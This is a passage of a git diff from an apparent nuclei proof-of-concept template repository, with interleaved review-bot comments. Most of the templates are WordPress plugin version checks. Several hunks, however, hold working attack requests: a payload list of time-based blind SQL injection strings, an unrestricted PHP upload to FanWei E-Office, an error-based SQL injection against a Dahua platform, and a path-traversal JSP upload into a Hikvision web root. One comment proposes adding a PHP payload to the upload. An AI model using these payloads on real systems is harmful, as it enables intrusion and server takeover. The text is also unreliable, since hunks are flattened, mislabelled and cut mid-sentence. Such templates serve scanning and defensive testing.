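carries the same `id: time-based-sqli`, so three files share one template id.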
diff --git a/poc/sql/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml b/poc/sql/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml
new file mode 100644
index 0000000000..edcefcecb4
--- /dev/null
+++ b/poc/sql/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7032-cabe7edb9453e46b358c075428df2586
+
+info:
+ name: >
+ Smart Online Order for Clover <= 1.5.6 - Missing Authorization to Plugin Deactivation and Data Deletion
+ author: topscoder
+ severity: high
+ description: >
+ The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'moo_deactivateAndClean' function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to deactivate the plugin and drop all plugin tables from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9a6b05b1-c649-4b72-b884-11fb83ec77f2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
+ cvss-score: 6.5
+ cve-id: CVE-2024-7032
+ metadata:
+ fofa-query: "wp-content/plugins/clover-online-orders/"
+ google-query: inurl:"/wp-content/plugins/clover-online-orders/"
+ shodan-query: 'vuln:CVE-2024-7032'
+ tags: cve,wordpress,wp-plugin,clover-online-orders,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clover-online-orders"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.6')
\ No newline at end of file
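Review bot: `severity: high` contradicts the template's own `cvss-score: 6.5` (CVSS v3.1 rates 4.0–6.9 as medium), and the last tag in `tags:` repeats the same value; both should read `medium`. The CVE-2024-7856 hunk below has the opposite mismatch — `severity: low` against `cvss-score: 9.1` and `tags: ...,low` — where the score maps to `critical`; CVE-2024-8051 (`medium`, 6.1) is the only one of the three that is consistent. Both CVE-2024-7032 and CVE-2024-7856 are also filed under poc/sql/ although their descriptions are a missing-authorization plugin deactivation and an arbitrary file deletion, neither of which is SQL-related.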
diff --git a/poc/sql/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml b/poc/sql/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml new file mode 100644 index 0000000000..1d4ab91acf --- /dev/null +++ b/poc/sql/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf + +info: + name: > + MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar <= 5.7.0.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Deletion + author: topscoder + severity: low + description: > + The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to unauthorized arbitrary file deletion due to a missing capability check on the removeTempFiles() function and insufficient path validation on the 'file' parameter in all versions up to, and including, 5.7.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files which can make remote code execution possible when wp-config.php is deleted. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/43adc9dd-1780-440f-90c2-ff05a22eb084?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-7856 + metadata: + fofa-query: "wp-content/plugins/mp3-music-player-by-sonaar/" + google-query: inurl:"/wp-content/plugins/mp3-music-player-by-sonaar/" + shodan-query: 'vuln:CVE-2024-7856' + tags: cve,wordpress,wp-plugin,mp3-music-player-by-sonaar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mp3-music-player-by-sonaar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mp3-music-player-by-sonaar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.7.0.1') \ No newline at end of file 
diff --git a/poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml b/poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml new file mode 100644 index 0000000000..6acd3dbd1f --- /dev/null +++ b/poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab + +info: + name: > + Special Feed Items <= 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Special Feed Items plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5a54d1d-3593-4ba1-a747-651278488be6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8051 + metadata: + fofa-query: "wp-content/plugins/special-feed-items/" + google-query: inurl:"/wp-content/plugins/special-feed-items/" + shodan-query: 'vuln:CVE-2024-8051' + tags: cve,wordpress,wp-plugin,special-feed-items,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/special-feed-items/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "special-feed-items" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 4e7ede529c..aa02a4941d 100644 
--- a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml 
@@ -1,29 +1,52 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" + +variables: + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate - Connection: close + POST /webservice/upload.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl + Accept-Encoding: gzip + Connection: close + + ------WebKitFormBoundaryakbyiukl + Content-Disposition: form-data; name="file"; filename="a.php4" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryakbyiukl-- + + - | + GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: name + group: 1 + regex: + - '([/*0-9a-zA-Z]+)\.php4$' + internal: true - req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' - condition: and + - body_2 == str2 + +# 
http://your-ip/attachment/回显的那串数字/a.php4 diff --git a/poc/sql/front-end-only-users-947badb91b071755d9969be9242e4456.yaml b/poc/sql/front-end-only-users-947badb91b071755d9969be9242e4456.yaml new file mode 100644 index 0000000000..18f0996b45 --- /dev/null +++ b/poc/sql/front-end-only-users-947badb91b071755d9969be9242e4456.yaml @@ -0,0 +1,59 @@ +id: front-end-only-users-947badb91b071755d9969be9242e4456 + +info: + name: > + Front End Users <= 3.2.28 - Authenticated (Contributor+) Time-Based SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec162cdc-d4cd-47d9-b941-24bfee6c48fd?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/front-end-only-users/" + google-query: inurl:"/wp-content/plugins/front-end-only-users/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,front-end-only-users,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/front-end-only-users/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "front-end-only-users" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.28') \ No newline at end of file diff --git a/poc/sql/popup-builder-6301c8edbc1b7bd38ba274bd8ed00bc7.yaml b/poc/sql/popup-builder-6301c8edbc1b7bd38ba274bd8ed00bc7.yaml new file mode 100644 index 0000000000..b626c51e7f --- /dev/null +++ b/poc/sql/popup-builder-6301c8edbc1b7bd38ba274bd8ed00bc7.yaml 
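Review bot: The matcher `body_2 == str2` cannot hold as the hunk reads: the multipart part uploaded as `a.php4` has an empty body, so nothing served back from `/attachment/` can equal `str2`, and `str1` is declared but never referenced; if the file content was stripped when this page was rendered, confirm it in the template source, otherwise the check is dead code. The hunk rewrites poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml in place into an E-Office upload.php check, so the filename, the poc/sql/ directory and the generic `id: FanWei` no longer describe the content — a new file with a descriptive id (for example `id: eoffice-upload-php-file-upload`, a constructed placeholder) would be clearer. The description also omits that this check leaves a file on the target that the template never removes; a comment such as `# NOTE: writes a file to the target's attachment directory and does not remove it` near the top would warn operators. The trailing comment `# http://your-ip/attachment/…/a.php4` is split across two lines here, and the same hunk is applied verbatim to poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml further down.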
@@ -0,0 +1,59 @@ +id: popup-builder-6301c8edbc1b7bd38ba274bd8ed00bc7 + +info: + name: > + Popup Builder <= 4.3.3 - Sensitive Information Exposure via Imported Subscribers CSV File + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/086cd6a0-adb6-4e12-b34c-630297f036f3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/popup-builder/" + google-query: inurl:"/wp-content/plugins/popup-builder/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,popup-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/popup-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "popup-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.3.3') \ No newline at end of file diff --git a/poc/sql/special-feed-items-27adb5630206288cc4533169053590e1.yaml b/poc/sql/special-feed-items-27adb5630206288cc4533169053590e1.yaml new file mode 100644 index 0000000000..d1a67b3855 --- /dev/null +++ b/poc/sql/special-feed-items-27adb5630206288cc4533169053590e1.yaml 
@@ -0,0 +1,59 @@ +id: special-feed-items-27adb5630206288cc4533169053590e1 + +info: + name: > + Special Feed Items <= 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5a54d1d-3593-4ba1-a747-651278488be6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/special-feed-items/" + google-query: inurl:"/wp-content/plugins/special-feed-items/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,special-feed-items,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/special-feed-items/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "special-feed-items" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/sql/theme-editor-28b564b15db8ff756b87ff0ae5c6d260.yaml b/poc/sql/theme-editor-28b564b15db8ff756b87ff0ae5c6d260.yaml new file mode 100644 index 0000000000..237e254681 --- /dev/null +++ b/poc/sql/theme-editor-28b564b15db8ff756b87ff0ae5c6d260.yaml 
@@ -0,0 +1,59 @@ +id: theme-editor-28b564b15db8ff756b87ff0ae5c6d260 + +info: + name: > + Theme Editor <= 2.8 - Authenticated (Admin+) PHAR Deserialization + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88fe46bf-8e85-4550-92ad-bdd426e5a745?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/theme-editor/" + google-query: inurl:"/wp-content/plugins/theme-editor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,theme-editor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/theme-editor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "theme-editor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8') \ No newline at end of file diff --git a/poc/sql/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml b/poc/sql/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml new file mode 100644 index 0000000000..5c4318cc5c --- /dev/null +++ b/poc/sql/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml 
@@ -0,0 +1,59 @@ +id: ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5 + +info: + name: > + TI WooCommerce Wishlist <= 2.8.2 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6c8456fa-939c-4ceb-8361-a8758aec7708?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ti-woocommerce-wishlist/" + google-query: inurl:"/wp-content/plugins/ti-woocommerce-wishlist/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ti-woocommerce-wishlist,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ti-woocommerce-wishlist/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ti-woocommerce-wishlist" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.2') \ No newline at end of file diff --git a/poc/sql/zephyr-project-manager-2f2a157dfc44eea8c90827e9ff434dbb.yaml b/poc/sql/zephyr-project-manager-2f2a157dfc44eea8c90827e9ff434dbb.yaml new file mode 100644 index 0000000000..ee6a3dbc6d --- /dev/null +++ b/poc/sql/zephyr-project-manager-2f2a157dfc44eea8c90827e9ff434dbb.yaml 
@@ -0,0 +1,59 @@ +id: zephyr-project-manager-2f2a157dfc44eea8c90827e9ff434dbb + +info: + name: > + Zephyr Project Manager <= 3.3.102 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/33bf39f8-6f56-4089-bb46-5d401af72953?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/zephyr-project-manager/" + google-query: inurl:"/wp-content/plugins/zephyr-project-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,zephyr-project-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zephyr-project-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.102') \ No newline at end of file diff --git a/poc/sql_injection/BlindSQLAuth.yaml b/poc/sql_injection/BlindSQLAuth.yaml index ce5d86554b..6fd8c3c79a 100644 --- a/poc/sql_injection/BlindSQLAuth.yaml +++ b/poc/sql_injection/BlindSQLAuth.yaml 
@@ -1,33 +1,33 @@
-id: time-based-sqli
-info:
- name: Time-Based Blind SQL Injection
- author: KhukuriRimal
- severity: Critical
- description: Detects time-based blind SQL injection vulnerability
-http:
- - method: GET
- path:
- - "{{BaseURL}}"
- payloads:
- injection:
- - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
- - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
- - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
- - "if(now()=sysdate(),SLEEP(7),0)"
- - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
- - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
- - "XOR(if(now()=sysdate(),sleep(7),0))XOR"
- - "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337"
- fuzzing:
- - part: query
- type: replace
- mode: single
- fuzz:
- - "{{injection}}"
- stop-at-first-match: true
- matchers:
- - type: dsl
- dsl:
- - "status_code == 200"
- - "duration>=7 && duration <=16"
- condition: and
\ No newline at end of file
+id: time-based-sqli
+info:
+ name: Time-Based Blind SQL Injection
+ author: Coffinxp/lostsec
+ severity: Critical
+ description: Detects time-based blind SQL injection vulnerability
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ payloads:
+ injection:
+ - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
+ - "'%2b(select*from(select(sleep(7)))a)%2b'"
+ - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
+ - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z"
+ - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X"
+ - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
+ - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X"
+ - "if(now()=sysdate(),SLEEP(7),0)"
+ - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
+ - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{injection}}"
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "duration>=7 && duration <=16"
diff --git a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 4e7ede529c..aa02a4941d 100644 --- a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml 
@@ -1,29 +1,52 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" + +variables: + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate - Connection: close + POST /webservice/upload.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl + Accept-Encoding: gzip + Connection: close + + ------WebKitFormBoundaryakbyiukl + Content-Disposition: form-data; name="file"; filename="a.php4" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryakbyiukl-- + + - | + GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: name + group: 1 + regex: + - '([/*0-9a-zA-Z]+)\.php4$' + internal: true - req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' - condition: and + - body_2 == str2 + +# 
http://your-ip/attachment/回显的那串数字/a.php4 diff --git a/poc/upload/Dahua_Video_FileUpload.yaml b/poc/upload/Dahua_Video_FileUpload.yaml index 1af31ba824..78d89c1465 100644 --- a/poc/upload/Dahua_Video_FileUpload.yaml +++ b/poc/upload/Dahua_Video_FileUpload.yaml 
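Review bot: The matcher `body_2 == str2` can never be true: `str1` and `str2` are declared under `variables` but neither is used in the upload request, whose file part is empty, so nothing on the server ever echoes `str2`. Put the marker into the uploaded file, e.g. `<?php echo "{{str2}}"; ?>` as the part body, and match with `contains(body_2, "{{str2}}")` rather than exact equality, since the served page may carry trailing whitespace. The PoC also writes a `.php4` file under `/attachment/` with no cleanup, so the template should carry an `intrusive` tag; and since it now tests `upload.php` rather than the HrmCareerApplyPerView SQLi, it belongs outside `poc/sql_injection/` with a unique `id` instead of the shared `FanWei`.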
@@ -1,43 +1,29 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform Video Arbitrary File Upload Vulnerability + name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is an arbitrary file upload vulnerability in the video interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to upload arbitrary files to the server and control server permissions + There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" -http: - - raw: - - | - POST /publishing/publishing/material/file/video HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 804 - Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 - Accept-Encoding: gzip, deflate - Connection: close - --dd8f988919484abab3816881c55272a7 - Content-Disposition: form-data; name="Filedata"; filename="Test.jsp" - Test - --dd8f988919484abab3816881c55272a7 - Content-Disposition: form-data; name="Submit" +http: + - method: GET + path: + - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" - submit - --dd8f988919484abab3816881c55272a7-- - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "success")' - - 'contains(body_1, "path")' - condition: and + - type: word + part: body + words: + - "c4ca" -# 
/publishingImg/VIDEO/230812152005170200.jsp + - type: status + status: + - 500 diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml index cd961f6e81..e86e8491d1 100644 --- a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml 
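Review bot: The word matcher `c4ca` is a weak confirmation for the new `getFaceCapture` injection: the `updatexml(1,concat(0x7e,(select md5(1)),0x7e),1)` payload puts the hash prefix `~c4ca4238a0b923820dcc509a6f75849` into the XPATH error (updatexml truncates the message at 32 characters), so matching the full visible prefix, `- "c4ca4238a0b923820dcc509a6f75849"`, avoids hits on unrelated bodies that happen to contain those four hex characters. Requiring `status: 500` under `matchers-condition: and` is brittle if the platform wraps database errors in a 200 JSON response; once the body match is specific the status matcher can go. The file is still named `Dahua_Video_FileUpload.yaml` under `poc/upload/` with `id: Dahua` although it is now an SQL injection check.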
@@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 
'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' + condition: and diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml index 7e328a8b1b..7f081b05e0 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml 
